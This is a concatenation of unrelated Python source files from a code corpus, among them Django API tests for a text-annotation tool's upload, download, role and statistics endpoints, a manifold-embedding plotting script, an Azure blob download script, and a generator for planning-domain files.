expected_status=status.HTTP_201_CREATED)
def test_can_upload_csv_file_does_not_match_column_and_row(self):
self.upload_test_helper(project_id=self.classification_project.id,
filename='example_column_and_row_not_matching.csv',
file_format='csv',
expected_status=status.HTTP_201_CREATED)
def test_cannot_upload_csv_file_has_too_many_columns(self):
self.upload_test_helper(project_id=self.classification_project.id,
filename='example.invalid.2.csv',
file_format='csv',
expected_status=status.HTTP_400_BAD_REQUEST)
def test_can_upload_classification_excel(self):
self.upload_test_helper(project_id=self.classification_project.id,
filename='example.xlsx',
file_format='excel',
expected_status=status.HTTP_201_CREATED)
def test_can_upload_seq2seq_excel(self):
self.upload_test_helper(project_id=self.seq2seq_project.id,
filename='example.xlsx',
file_format='excel',
expected_status=status.HTTP_201_CREATED)
def test_can_upload_single_column_excel(self):
self.upload_test_helper(project_id=self.seq2seq_project.id,
filename='example_one_column.xlsx',
file_format='excel',
expected_status=status.HTTP_201_CREATED)
def test_can_upload_excel_file_does_not_match_column_and_row(self):
self.upload_test_helper(project_id=self.classification_project.id,
filename='example_column_and_row_not_matching.xlsx',
file_format='excel',
expected_status=status.HTTP_201_CREATED)
def test_cannot_upload_excel_file_has_too_many_columns(self):
self.upload_test_helper(project_id=self.classification_project.id,
filename='example.invalid.2.xlsx',
file_format='excel',
expected_status=status.HTTP_400_BAD_REQUEST)
@override_settings(IMPORT_BATCH_SIZE=1)
def test_can_upload_small_batch_size(self):
self.upload_test_helper(project_id=self.seq2seq_project.id,
filename='example_one_column_no_header.xlsx',
file_format='excel',
expected_status=status.HTTP_201_CREATED)
def test_can_upload_classification_jsonl(self):
self.upload_test_helper(project_id=self.classification_project.id,
filename='classification.jsonl',
file_format='json',
expected_status=status.HTTP_201_CREATED)
self.label_test_helper(
project_id=self.classification_project.id,
expected_labels=[
{'text': 'positive', 'suffix_key': 'p', 'prefix_key': None},
{'text': 'negative', 'suffix_key': 'n', 'prefix_key': None},
{'text': 'neutral', 'suffix_key': 'n', 'prefix_key': 'ctrl'},
],
expected_label_keys=[
'background_color',
'text_color',
])
def test_can_upload_labeling_jsonl(self):
self.upload_test_helper(project_id=self.labeling_project.id,
filename='labeling.jsonl',
file_format='json',
expected_status=status.HTTP_201_CREATED)
self.label_test_helper(
project_id=self.labeling_project.id,
expected_labels=[
{'text': 'LOC', 'suffix_key': 'l', 'prefix_key': None},
{'text': 'ORG', 'suffix_key': 'o', 'prefix_key': None},
{'text': 'PER', 'suffix_key': 'p', 'prefix_key': None},
],
expected_label_keys=[
'background_color',
'text_color',
])
def test_can_upload_seq2seq_jsonl(self):
self.upload_test_helper(project_id=self.seq2seq_project.id,
filename='seq2seq.jsonl',
file_format='json',
expected_status=status.HTTP_201_CREATED)
def test_can_upload_plain_text(self):
self.upload_test_helper(project_id=self.classification_project.id,
filename='example.txt',
file_format='plain',
expected_status=status.HTTP_201_CREATED)
def test_can_upload_data_without_label(self):
self.upload_test_helper(project_id=self.classification_project.id,
filename='example.jsonl',
file_format='json',
expected_status=status.HTTP_201_CREATED)
@classmethod
def doCleanups(cls):
remove_all_role_mappings()
@override_settings(CLOUD_BROWSER_APACHE_LIBCLOUD_PROVIDER='LOCAL')
@override_settings(CLOUD_BROWSER_APACHE_LIBCLOUD_ACCOUNT=os.path.dirname(DATA_DIR))
@override_settings(CLOUD_BROWSER_APACHE_LIBCLOUD_SECRET_KEY='not-used')
class TestCloudUploader(TestUploader):
def upload_test_helper(self, project_id, filename, file_format, expected_status, **kwargs):
query_params = {
'project_id': project_id,
'upload_format': file_format,
'container': kwargs.pop('container', os.path.basename(DATA_DIR)),
'object': filename,
}
query_params.update(kwargs)
response = self.client.get(reverse('cloud_uploader'), query_params)
self.assertEqual(response.status_code, expected_status)
def test_cannot_upload_with_missing_file(self):
self.upload_test_helper(project_id=self.classification_project.id,
filename='does-not-exist',
file_format='json',
expected_status=status.HTTP_400_BAD_REQUEST)
def test_cannot_upload_with_missing_container(self):
self.upload_test_helper(project_id=self.classification_project.id,
filename='example.jsonl',
container='does-not-exist',
file_format='json',
expected_status=status.HTTP_400_BAD_REQUEST)
def test_cannot_upload_with_missing_query_parameters(self):
response = self.client.get(reverse('cloud_uploader'), {'project_id': self.classification_project.id})
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_can_upload_with_redirect(self):
self.upload_test_helper(project_id=self.classification_project.id,
filename='example.jsonl',
next='http://somewhere',
file_format='json',
expected_status=status.HTTP_302_FOUND)
def test_can_upload_with_redirect_to_blank(self):
self.upload_test_helper(project_id=self.classification_project.id,
filename='example.jsonl',
next='about:blank',
file_format='json',
expected_status=status.HTTP_201_CREATED)
class TestFeatures(APITestCase):
@classmethod
def setUpTestData(cls):
cls.user_name = 'user_name'
cls.user_pass = '<PASSWORD>'
create_default_roles()
cls.user = User.objects.create_user(username=cls.user_name, password=<PASSWORD>, email='<EMAIL>')
def setUp(self):
self.client.login(username=self.user_name, password=self.user_pass)
@override_settings(CLOUD_BROWSER_APACHE_LIBCLOUD_PROVIDER=None)
def test_no_cloud_upload(self):
response = self.client.get(reverse('features'))
self.assertFalse(response.json().get('cloud_upload'))
@override_settings(IMPORT_BATCH_SIZE=2)
class TestParser(APITestCase):
def parser_helper(self, filename, parser, include_label=True):
with open(os.path.join(DATA_DIR, filename), mode='rb') as f:
result = list(parser.parse(f))
for data in result:
for r in data:
self.assertIn('text', r)
if include_label:
self.assertIn('labels', r)
return result
def test_give_valid_data_to_conll_parser(self):
self.parser_helper(filename='labeling.conll', parser=CoNLLParser())
def test_give_valid_data_to_conll_parser_with_trailing_newlines(self):
result = self.parser_helper(filename='labeling.trailing.conll', parser=CoNLLParser())
self.assertEqual(len(result), 1)
self.assertEqual(len(result[0]), 1)
def test_plain_parser(self):
self.parser_helper(filename='example.txt', parser=PlainTextParser(), include_label=False)
def test_give_invalid_data_to_conll_parser(self):
with self.assertRaises(FileParseException):
self.parser_helper(filename='labeling.invalid.conll',
parser=CoNLLParser())
def test_give_classification_data_to_csv_parser(self):
self.parser_helper(filename='example.csv', parser=CSVParser(), include_label=False)
def test_give_seq2seq_data_to_csv_parser(self):
self.parser_helper(filename='example.csv', parser=CSVParser(), include_label=False)
def test_give_classification_data_to_json_parser(self):
self.parser_helper(filename='classification.jsonl', parser=JSONParser())
def test_give_labeling_data_to_json_parser(self):
self.parser_helper(filename='labeling.jsonl', parser=JSONParser())
def test_give_seq2seq_data_to_json_parser(self):
self.parser_helper(filename='seq2seq.jsonl', parser=JSONParser())
def test_give_data_without_label_to_json_parser(self):
self.parser_helper(filename='example.jsonl', parser=JSONParser(), include_label=False)
def test_give_labeling_data_to_fasttext_parser(self):
self.parser_helper(filename='example_fasttext.txt', parser=FastTextParser())
def test_give_data_without_label_name_to_fasttext_parser(self):
with self.assertRaises(FileParseException):
self.parser_helper(filename='example_fasttext_label_tag_without_name.txt', parser=FastTextParser())
def test_give_data_without_text_to_fasttext_parser(self):
with self.assertRaises(FileParseException):
self.parser_helper(filename='example_fasttext_without_text.txt', parser=FastTextParser())
class TestDownloader(APITestCase):
@classmethod
def setUpTestData(cls):
cls.super_user_name = 'super_user_name'
cls.super_user_pass = '<PASSWORD>'
# Todo: change super_user to project_admin.
create_default_roles()
super_user = User.objects.create_superuser(username=cls.super_user_name,
password=<PASSWORD>,
email='<EMAIL>')
cls.classification_project = mommy.make('TextClassificationProject',
users=[super_user], project_type=DOCUMENT_CLASSIFICATION)
cls.labeling_project = mommy.make('SequenceLabelingProject',
users=[super_user], project_type=SEQUENCE_LABELING)
cls.seq2seq_project = mommy.make('Seq2seqProject', users=[super_user], project_type=SEQ2SEQ)
cls.speech2text_project = mommy.make('Speech2textProject', users=[super_user], project_type=SPEECH2TEXT)
cls.classification_url = reverse(viewname='doc_downloader', args=[cls.classification_project.id])
cls.labeling_url = reverse(viewname='doc_downloader', args=[cls.labeling_project.id])
cls.seq2seq_url = reverse(viewname='doc_downloader', args=[cls.seq2seq_project.id])
cls.speech2text_url = reverse(viewname='doc_downloader', args=[cls.speech2text_project.id])
def setUp(self):
self.client.login(username=self.super_user_name,
password=<PASSWORD>)
def download_test_helper(self, url, format, expected_status):
response = self.client.get(url, data={'q': format})
self.assertEqual(response.status_code, expected_status)
def test_cannot_download_conll_format_file(self):
self.download_test_helper(url=self.labeling_url,
format='conll',
expected_status=status.HTTP_400_BAD_REQUEST)
def test_can_download_classification_csv(self):
self.download_test_helper(url=self.classification_url,
format='csv',
expected_status=status.HTTP_200_OK)
def test_can_download_labeling_csv(self):
self.download_test_helper(url=self.labeling_url,
format='csv',
expected_status=status.HTTP_200_OK)
def test_can_download_seq2seq_csv(self):
self.download_test_helper(url=self.seq2seq_url,
format='csv',
expected_status=status.HTTP_200_OK)
def test_can_download_classification_jsonl(self):
self.download_test_helper(url=self.classification_url,
format='json',
expected_status=status.HTTP_200_OK)
def test_can_download_labeling_jsonl(self):
self.download_test_helper(url=self.labeling_url,
format='json',
expected_status=status.HTTP_200_OK)
def test_can_download_seq2seq_jsonl(self):
self.download_test_helper(url=self.seq2seq_url,
format='json',
expected_status=status.HTTP_200_OK)
def test_can_download_speech2text_jsonl(self):
self.download_test_helper(url=self.speech2text_url,
format='json',
expected_status=status.HTTP_200_OK)
def test_can_download_labelling_jsonl(self):
self.download_test_helper(url=self.labeling_url,
format='jsonl',
expected_status=status.HTTP_200_OK)
def test_can_download_plain_text(self):
self.download_test_helper(url=self.classification_url,
format='plain',
expected_status=status.HTTP_400_BAD_REQUEST)
class TestStatisticsAPI(APITestCase, TestUtilsMixin):
@classmethod
def setUpTestData(cls):
cls.super_user_name = 'super_user_name'
cls.super_user_pass = '<PASSWORD>'
cls.other_user_name = 'other_user_name'
cls.other_user_pass = '<PASSWORD>'
create_default_roles()
# Todo: change super_user to project_admin.
super_user = User.objects.create_superuser(username=cls.super_user_name,
password=<PASSWORD>,
email='<EMAIL>')
other_user = User.objects.create_user(username=cls.other_user_name,
password=<PASSWORD>.<PASSWORD>,
email='<EMAIL>')
cls.project = mommy.make('TextClassificationProject', users=[super_user, other_user])
doc1 = mommy.make('Document', project=cls.project)
doc2 = mommy.make('Document', project=cls.project)
mommy.make('DocumentAnnotation', document=doc1, user=super_user)
mommy.make('DocumentAnnotation', document=doc2, user=other_user)
cls.url = reverse(viewname='statistics', args=[cls.project.id])
cls.doc = Document.objects.filter(project=cls.project)
assign_user_to_role(project_member=other_user, project=cls.project,
role_name=settings.ROLE_ANNOTATOR)
@classmethod
def doCleanups(cls):
remove_all_role_mappings()
def test_returns_exact_progress(self):
self.client.login(username=self.super_user_name,
password=self.<PASSWORD>)
response = self.client.get(self.url, format='json')
self.assertEqual(response.data['total'], 2)
self.assertEqual(response.data['remaining'], 1)
def test_returns_exact_progress_with_collaborative_annotation(self):
self._patch_project(self.project, 'collaborative_annotation', True)
self.client.login(username=self.other_user_name,
password=self.other_<PASSWORD>)
response = self.client.get(self.url, format='json')
self.assertEqual(response.data['total'], 2)
self.assertEqual(response.data['remaining'], 0)
def test_returns_user_count(self):
self.client.login(username=self.super_user_name,
password=self.super_user_<PASSWORD>)
response = self.client.get(self.url, format='json')
self.assertIn('label', response.data)
self.assertIsInstance(response.data['label'], dict)
def test_returns_label_count(self):
self.client.login(username=self.super_user_name,
password=self.super_user_pass)
response = self.client.get(self.url, format='json')
self.assertIn('user', response.data)
self.assertIsInstance(response.data['user'], dict)
def test_returns_partial_response(self):
self.client.login(username=self.super_user_name,
password=self.super_user_<PASSWORD>)
response = self.client.get(f'{self.url}?include=user', format='json')
self.assertEqual(list(response.data.keys()), ['user'])
class TestUserAPI(APITestCase):
@classmethod
def setUpTestData(cls):
cls.super_user_name = 'super_user_name'
cls.super_user_pass = '<PASSWORD>'
create_default_roles()
User.objects.create_superuser(username=cls.super_user_name,
password=<PASSWORD>,
email='<EMAIL>')
cls.url = reverse(viewname='user_list')
def test_returns_user_count(self):
self.client.login(username=self.super_user_name,
password=self.<PASSWORD>)
response = self.client.get(self.url, format='json')
self.assertEqual(1, len(response.data))
class TestRoleAPI(APITestCase):
@classmethod
def setUpTestData(cls):
cls.user_name = 'user_name'
cls.user_pass = '<PASSWORD>'
cls.project_admin_name = 'project_admin_name'
cls.project_admin_pass = '<PASSWORD>'
create_default_roles()
cls.user = User.objects.create_user(username=cls.user_name,
password=cls.user_pass)
User.objects.create_superuser(username=cls.project_admin_name,
password=<PASSWORD>,
email='<EMAIL>')
cls.url = reverse(viewname='roles')
def test_cannot_create_multiple_roles_with_same_name(self):
self.client.login(username=self.project_admin_name,
password=self.project_admin_pass)
roles = [
{'name': 'examplerole', 'description': 'example'},
{'name': 'examplerole', 'description': 'example'}
]
self.client.post(self.url, format='json', data=roles[0])
second_response = self.client.post(self.url, format='json', data=roles[1])
self.assertEqual(second_response.status_code, status.HTTP_400_BAD_REQUEST)
def test_nonadmin_cannot_create_role(self):
self.client.login(username=self.user_name,
password=self.user_pass)
data = {'name': 'testrole', 'description': 'example'}
response = self.client.post(self.url, format='json', data=data)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_admin_can_create_role(self):
self.client.login(username=self.project_admin_name,
password=self.project_admin_pass)
data = {'name': 'testrole', 'description': 'example'}
response = self.client.post(self.url, format='json', data=data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_admin_can_get_roles(self):
self.client.login(username=self.project_admin_name,
password=self.project_admin_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
class TestRoleMappingListAPI(APITestCase):
@classmethod
def setUpTestData(cls):
cls.project_member_name = 'project_member_name'
cls.project_member_pass = '<PASSWORD>'
cls.second_project_member_name = 'second_project_member_name'
cls.second_project_member_pass = '<PASSWORD>'
cls.project_admin_name = 'project_admin_name'
cls.project_admin_pass = '<PASSWORD>'
create_default_roles()
project_member = User.objects.create_user(username=cls.project_member_name,
password=cls.project_member_<PASSWORD>)
cls.second_project_member = User.objects.create_user(username=cls.second_project_member_name,
password=cls.second_project_member_pass)
project_admin = User.objects.create_user(username=cls.project_admin_name,
password=<PASSWORD>)
cls.main_project = mommy.make('Project', users=[project_member, project_admin, cls.second_project_member])
cls.other_project = mommy.make('Project', users=[cls.second_project_member, project_admin])
cls.admin_role = Role.objects.get(name=settings.ROLE_PROJECT_ADMIN)
cls.role = mommy.make('Role', name='otherrole')
mommy.make('RoleMapping', role=cls.admin_role, project=cls.main_project, user=project_admin)
cls.data = {'user': project_member.id, 'role': cls.admin_role.id, 'project': cls.main_project.id}
cls.other_url = reverse(viewname='rolemapping_list', args=[cls.other_project.id])
cls.url = reverse(viewname='rolemapping_list', args=[cls.main_project.id])
def test_returns_mappings_to_project_admin(self):
self.client.login(username=self.project_admin_name,
password=self.project_<PASSWORD>)
response = self.client.get(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_allows_superuser_to_create_mapping(self):
self.client.login(username=self.project_admin_name,
password=self.project_<PASSWORD>_<PASSWORD>)
response = self.client.post(self.url, format='json', data=self.data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_do_not_allow_nonadmin_to_create_mapping(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.post(self.url, format='json', data=self.data)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_do_not_return_mappings_to_nonadmin(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
class TestRoleMappingDetailAPI(APITestCase):
@classmethod
def setUpTestData(cls):
cls.project_admin_name = 'project_admin_name'
cls.project_admin_pass = '<PASSWORD>'
cls.project_member_name = 'project_member_name'
cls.project_member_pass = '<PASSWORD>'
cls.non_project_member_name = 'non_project_member_name'
cls.non_project_member_pass = '<PASSWORD>'
create_default_roles()
project_admin = User.objects.create_user(username=cls.project_admin_name,
password=<PASSWORD>)
project_member = User.objects.create_user(username=cls.project_member_name,
password=<PASSWORD>)
User.objects.create_user(username=cls.non_project_member_name, password=cls.non_project_member_pass)
project = mommy.make('Project', users=[project_admin, project_member])
admin_role = Role.objects.get(name=settings.ROLE_PROJECT_ADMIN)
annotator_role = Role.objects.get(name=settings.ROLE_ANNOTATOR)
cls.rolemapping = mommy.make('RoleMapping', role=admin_role, project=project, user=project_admin)
cls.url = reverse(viewname='rolemapping_detail', args=[project.id, cls.rolemapping.id])
cls.data = {'role': annotator_role.id }
def test_returns_rolemapping_to_project_member(self):
self.client.login(username=self.project_admin_name,
password=self.project_admin_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(response.data['id'], self.rolemapping.id)
def test_do_not_return_mapping_to_non_project_member(self):
self.client.login(username=self.non_project_member_name,
password=self.non_project_member_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_allows_admin_to_update_mapping(self):
self.client.login(username=self.project_admin_name,
password=self.project_<PASSWORD>)
response = self.client.patch(self.url, format='json', data=self.data)
self.assertEqual(response.data['role'], self.data['role'])
def test_disallows_project_member_to_update_mapping(self):
self.client.login(username=self.project_member_name,
password=self.project_member_<PASSWORD>)
response = self.client.patch(self.url, format='json', data=self.data)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_allows_admin_to_delete_mapping(self):
self.client.login(username=self.project_admin_name,
password=self.project_<PASSWORD>_<PASSWORD>)
response = self.client.delete(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_disallows_project_member_to_delete_mapping(self):
self.client.login(username=self.project_member_name,
password=self.project_member_<PASSWORD>)
response = self.client.delete(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
| StarcoderdataPython |
90799 | <reponame>peekxc/tallem
# %% Imports
from tallem import TALLEM
from tallem.dimred import *
from tallem.cover import *
from tallem.distance import dist
from tallem.samplers import landmarks
from tallem.datasets import *
import matplotlib.pyplot as plt
# %% Load frey faces
import pickle
ff = pickle.load(open('/Users/mpiekenbrock/tallem/data/frey_faces.pickle', "rb")).T # 20 x 28
# %% Run TALLEM on frey faces
from tallem.dimred import rnn_graph, knn_graph, geodesic_dist
#G = rnn_graph(ff)
G = knn_graph(ff, k=20)
D = geodesic_dist(np.ascontiguousarray(G.A, dtype=np.float64))
cover = LandmarkCover(D, n_sets=25, scale=1.15)
# [len(subset) for subset in cover.values()]
top = TALLEM(cover, local_map="pca2", D=2)
emb = top.fit_transform(X=ff)
# %% Plot the points + the faces as images using matplotlib
fig = plt.figure(figsize=(8, 8), dpi=300)
ax = plt.gca()
ax.axis('off')
plt.scatter(*emb.T, alpha=0.70, s=8, edgecolor='gray',linewidth=0.30)
Lind, Lrad = landmarks(emb, k = 120)
img_width = 0.02*np.max(dist(emb)) # size of plotted images
for i in Lind:
bbox = np.array([emb[i,0] + img_width*np.array([-1.0, 1.0]), emb[i,1] + img_width*np.array([-1.0, 1.0])]).flatten()
face_im = ax.imshow(ff[i,:].reshape((28,20)), origin='upper', extent=bbox, cmap='gray', vmin=0, vmax=255)
face_im.set_zorder(20)
ax.set_xlim(left=np.min(emb[:,0])-img_width, right=np.max(emb[:,0])+img_width)
ax.set_ylim(bottom=np.min(emb[:,1])-img_width, top=np.max(emb[:,1])+img_width)
# plt.savefig("frey_faces.png", dpi=300, format="png", pad_inches=0.0, transparent=True)
plt.show()
# %% (Optional) Plot the points + the faces as images using matplotlib + datashader
import datashader as ds
from datashader.mpl_ext import dsshow, alpha_colormap
from pandas import DataFrame # bleh why is this necessary datashader
import datashader.transfer_functions as tf
from functools import partial
fig = plt.figure(figsize=(3.25, 3.25), dpi=300)
ax = plt.gca()
ax.axis('off')
df = DataFrame(emb, columns = ['x','y'])
shade_hook=partial(tf.dynspread, threshold=0.001, how='add', max_px=100)
dsshow(df, ds.Point('x', 'y'), norm='eq_hist', aspect='equal', ax=ax)
for i in Lind:
bbox = np.array([emb[i,0] + img_width*np.array([-1.0, 1.0]), emb[i,1] + img_width*np.array([-1.0, 1.0])]).flatten()
face_im = ax.imshow(ff[i,:].reshape((28,20)), origin='upper', extent=bbox, cmap='gray', vmin=0, vmax=255)
face_im.set_zorder(20)
ax.set_xlim(left=np.min(emb[:,0])-img_width, right=np.max(emb[:,0])+img_width)
ax.set_ylim(bottom=np.min(emb[:,1])-img_width, top=np.max(emb[:,1])+img_width)
plt.savefig("frey_faces.png", dpi=300, format="png", pad_inches=0.0, transparent=True)
plt.show()
# da = DSArtist(ax_r[0], df, 'x', 'y', ds.mean('z'), norm = mcolors.LogNorm())
# %% MNIST eights
import pickle
mn = pickle.load(open('/Users/mpiekenbrock/tallem/data/mnist_eights.pickle', "rb")).T # 28 x 28
rotate = lambda x: np.fliplr(x.T)
mn = np.array([rotate(mn[:,:,i]).flatten() for i in range(mn.shape[2])])
# %% Parameterize TALLEM
G = rnn_graph(mn, p=0.001)
# G = knn_graph(mn, k=20)
D = geodesic_dist(rnn_graph(mn, p=0.001).A)
cover = LandmarkCover(D, n_sets=80, scale=1.15) # 80, scale=1.10
[len(subset) for subset in cover.values()]
top = TALLEM(cover, local_map="pca2", D=2)
emb = top.fit_transform(X=mn)
# LI, LR = landmarks(mn, 80)
# %% Make scatter plot + images
fig = plt.figure(figsize=(5, 5), dpi=300)
ax = plt.gca()
ax.axis('off')
plt.scatter(*emb.T, alpha=0.70, s=8, edgecolor='gray',linewidth=0.30)
Lind, Lrad = landmarks(emb, k = 120)
img_width = 0.02*np.max(dist(emb))
Lind, Lrad = landmarks(emb, k = 120)
for i in Lind:
bbox = np.array([emb[i,0] + img_width*np.array([-1.0, 1.0]), emb[i,1] + img_width*np.array([-1.0, 1.0])]).flatten()
face_im = ax.imshow(mn[i,:].reshape((28,28)), origin='upper', extent=bbox, cmap='gray', vmin=0, vmax=255)
face_im.set_zorder(20)
ax.set_xlim(left=np.min(emb[:,0]), right=np.max(emb[:,0]))
ax.set_ylim(bottom=np.min(emb[:,1]), top=np.max(emb[:,1]))
# plt.savefig("mnist_eights.png", dpi=300, format="png", pad_inches=0.0, transparent=True)
plt.show()
# %% (optional) MNIST datashader figure
import datashader as ds
from datashader.mpl_ext import dsshow, alpha_colormap
from pandas import DataFrame # bleh why is this necessary datashader
import datashader.transfer_functions as tf
from functools import partial
fig = plt.figure(figsize=(3.25, 3.25), dpi=300)
ax = plt.gca()
ax.axis('off')
df = DataFrame(emb, columns = ['x','y'])
shade_hook=partial(tf.dynspread, threshold=0.999, how='add', max_px=100)
dsshow(df, ds.Point('x', 'y'), norm='linear', aspect='equal', vmax=10, ax=ax, vmin=1, cmap="viridis")
for i in Lind:
bbox = np.array([emb[i,0] + img_width*np.array([-1.0, 1.0]), emb[i,1] + img_width*np.array([-1.0, 1.0])]).flatten()
face_im = ax.imshow(mn[i,:].reshape((28,28)), origin='upper', extent=bbox, cmap='gray', vmin=0, vmax=255)
face_im.set_zorder(20)
ax.set_xlim(left=np.min(emb[:,0])+img_width, right=np.max(emb[:,0])+img_width)
ax.set_ylim(bottom=np.min(emb[:,1])+img_width, top=np.max(emb[:,1])+img_width)
plt.savefig("mnist_eights.png", dpi=300, format="png", pad_inches=0.0, transparent=True)
plt.show() | StarcoderdataPython |
1743485 | <filename>django_loki/__init__.py
"""
MIT License
Copyright (c) 2021 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
"""
from .handlers import LokiHttpHandler
from .formatters import LokiFormatter
__all__ = ['LokiHttpHandler', 'LokiFormatter']
__version__ = "0.1.0"
name = "django_loki"
| StarcoderdataPython |
1629263 | """
Need to pip install azure-storage-blob
Working to get an example loader from azure
"""
from azure.storage.blob import BlobServiceClient, generate_account_sas, ResourceTypes, AccountSasPermissions, ContainerClient, BlobClient
import pandas as pd
from collections import defaultdict
if __name__ == "__main__":
# blob_service_client = BlobServiceClient(account_url="https://datavillagesa.blob.core.windows.net")
url_postfix = 'sv=2018-03-28&sr=c&sig=ySdG6%2BRmccOC1Eg4H0UlVDyVQgAQ1QzQdxCh1dxcTXs%3D&se=2021-05-16T16%3A56%3A39Z&sp=rl'
url = 'https://datavillagesa.blob.core.windows.net/northernlights?'
nl_container = ContainerClient.from_container_url(container_url=url+url_postfix)
blob_list = nl_container.list_blobs()
output = defaultdict(list)
for blob in blob_list:
output['SourceName'].append(blob.name)
blob_client = BlobClient.from_blob_url(blob_url=f"https://datavillagesa.blob.core.windows.net/northernlights/{blob.name}?{url_postfix}")
with open("BlockDestination.txt", "wb") as my_blob:
blob_data = blob_client.download_blob()
blob_data.readinto(my_blob)
print('here')
pd.DataFrame(output).to_csv('name_list.csv')
print('here')
| StarcoderdataPython |
55779 | <filename>Model using Optical flow/evaluate.py
import numpy as np
import torch
from climatehack import BaseEvaluator
from optical_flow_model import get_flow_images
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print("Running on: {}".format(str(device).upper())) #For Debugging
class Evaluator(BaseEvaluator):
def setup(self):
"""Sets up anything required for evaluation.
In this case, it loads the trained model (in evaluation mode)."""
if not torch.cuda.is_available():
print("Warning: If you are running this on a CPU it could take a very long time.")
def predict(self, coordinates: np.ndarray, data: np.ndarray) -> np.ndarray:
"""Makes a prediction for the next two hours of satellite imagery.
Args:
coordinates (np.ndarray): the OSGB x and y coordinates (2, 128, 128)
data (np.ndarray): an array of 12 128*128 satellite images (12, 128, 128)
Returns:
np.ndarray: an array of 24 64*64 satellite image predictions (24, 64, 64)
"""
assert coordinates.shape == (2, 128, 128)
assert data.shape == (12, 128, 128)
data /= 1023.0
prediction = get_flow_images(data)
prediction *= 1023
prediction = prediction.cpu().detach().numpy()
prediction = prediction.astype(np.float32)
assert prediction.shape == (24, 64, 64)
return prediction
def main():
evaluator = Evaluator()
evaluator.evaluate()
if __name__ == "__main__":
main() | StarcoderdataPython |
39345 | <reponame>cc1-cloud/cc1
# -*- coding: utf-8 -*-
# @COPYRIGHT_begin
#
# Copyright [2010-2014] Institute of Nuclear Physics PAN, Krakow, Poland
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @COPYRIGHT_end
"""@package src.clm.views.user.message
@alldecoratedby{src.clm.utils.decorators.user_log}
"""
from clm.models.message import Message
from clm.utils.decorators import user_log
from clm.utils.exception import CLMException
@user_log(log=True)
def delete(cm_id, caller_id, message_id):
"""
Deletes specified Message.
@clmview_user
@param_post{message_id,int} id of the message to delete
"""
m = Message.get(message_id)
try:
m.delete()
except:
raise CLMException('message_delete')
@user_log(log=False)
def get_list(cm_id, caller_id):
"""
Returns list of caller's messages.
@clmview_user
@response{list(dict)} dicts describing caller's messages
"""
return [m.dict for m in Message.objects.filter(user_id=caller_id)]
| StarcoderdataPython |
11540 | from __future__ import division
import itertools
import json
import math
import os
import random
import shutil
import subprocess
import sys
durationA = str(5)
durationB = str(4)
durationC = str(1)
def main():
if len(sys.argv) > 1:
nbDepth = int(sys.argv[1])
if nbDepth < 2 :
nbDepth =2
else :
nbDepth =2
mainFolder = "depth"
if not os.path.exists(mainFolder):
subprocess.call(["mkdir", mainFolder])
generateDomain("depth", nbDepth)
#print "Every file has been written. Exiting"
def generateDomain(folderName, nbDepth):
domainFilename = folderName + "/" + folderName + "-flat" + str(nbDepth) + ".dom.anml"
printDomainToFile(domainFilename, nbDepth)
domainFilename = folderName + "/" + folderName + "-hier" + str(nbDepth) + ".dom.anml"
printDomainHierToFile(domainFilename, nbDepth)
def printDomainToFile(domainFilename, nbDepth):
with open(domainFilename, "w") as f:
for i in range(0, nbDepth):
f.write("predicate a" + str(i+1) +"();\n")
f.write("predicate b" + str(i+1) +"();\n")
f.write("predicate c" + str(i+1) +"();\n")
f.write("predicate d" + str(i+1) +"();\n")
f.write("predicate e" + str(i+1) +"();\n")
f.write("\naction An" + str(i+1) + " () {\n")
f.write("\tduration := " + durationA + ";\n")
if i > 0:
f.write("\t[start] {\n")
f.write("\t\tb"+ str(i) +" == true;\n")
f.write("\t\td"+ str(i) +" == true;\n")
f.write("\t\te"+ str(i) +" == true;\n")
f.write("\t};\n")
f.write("\t[start] a" + str(i+1) + " := true;\n")
f.write("\t[end] {\n")
f.write("\t\ta" + str(i+1) + " := false;\n")
f.write("\t\tb" + str(i+1) + " := true;\n")
f.write("\t\td" + str(i+1) + " := false;\n")
f.write("\t};\n")
f.write("};\n")
f.write("\naction Bn" + str(i+1) + " () {\n")
f.write("\tduration := " + durationB + ";\n")
f.write("\t[start] a" + str(i+1) + " == true;\n")
f.write("\t[start] c" + str(i+1) + " := true;\n")
f.write("\t[end] {\n")
f.write("\t\tc" + str(i+1) + " := false;\n")
f.write("\t\td" + str(i+1) + " := true;\n")
f.write("\t};\n")
f.write("};\n")
f.write("\naction Cn" + str(i+1) + " () {\n")
f.write("\tduration := " + durationC + ";\n")
f.write("\t[start] c" + str(i+1) + " == true;\n")
f.write("\t[end] {\n")
f.write("\t\tb" + str(i+1) + " := false;\n")
f.write("\t\te" + str(i+1) + " := true;\n")
f.write("\t};\n")
f.write("};\n")
######################## problem ###############
f.write("\n/*******Problem************/\n")
f.write("[all] contains{\n")
f.write("\tCn" + str(nbDepth) +"();\n")
f.write("};")
def printDomainHierToFile(domainFilename, nbDepth):
with open(domainFilename, "w") as f:
